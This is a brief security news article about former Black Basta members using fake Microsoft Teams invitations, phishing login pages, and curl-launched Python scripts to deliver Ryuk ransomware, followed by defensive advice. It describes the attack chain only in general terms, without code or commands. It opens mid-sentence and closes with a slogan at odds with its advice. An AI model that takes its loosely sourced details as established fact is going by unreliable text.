2025 Cyber Attacks: How Ex-Black Basta Members Utilize Microsoft Teams and Python Scripts
published Tuesday.
Attack Methodology
According to the report, the threat actors have been hiding messages with malicious links or attachments in invitation emails for Microsoft Teams’ meetings.
These emails were designed to appear legitimate and created a seamless transition to the phishing websites fronted as Microsoft Teams’ login portal.
Once the victims entered their credentials, the attackers gained unauthorized access to their accounts, further escalating within the network.
With the access established, the attackers then exploited poorly configured or outdated systems to execute Python scripts remotely.
The Python scripts, which would fetch and deploy malicious payloads on the victim’s network, were run through cURL requests.
Vulnerable servers, compromised during the previous attack layer, were exposed to these cURL requests fetching and running the malicious scripts.
Real-world Example
In one of the cases studied, a healthcare service provider was targeted.
The attackers introduced a malicious Python script fetching the Ryuk ransomware as the payload.
ReliaQuest identified that the payload was downloaded from a website impersonating a legitimate Canadian healthcare site.
Post-infection, the Ryuk ransomware encrypted files, rendering them inaccessible and demanding a ransom for their decryption.
Preventive Measures
Organizations need to adopt multi-layered security strategies to mitigate such threats.
They should implement stringent access controls and multi-factor authentication for critical accounts, especially those accessible remotely or through virtual meetings platforms like Microsoft Teams.
Regular patching and system updates are crucial in preventing attacks through vulnerabilities.
Additionally, monitoring network traffic and keeping an eye out for cURL requests or unusual Python script execution can offer early threat detection.
A robust incident response plan can dramatically reduce the damages following a successful breach by limiting the exposure, isolating compromised systems, and neutralizing the threat.
Conclusions
The sophistication, ease of execution and the potential yield make such multi-step attacks appealing to threat actors.
We must stay aware, maintain technical hygiene, and be prepared to act fast.
After all, the best defense is a good offense.
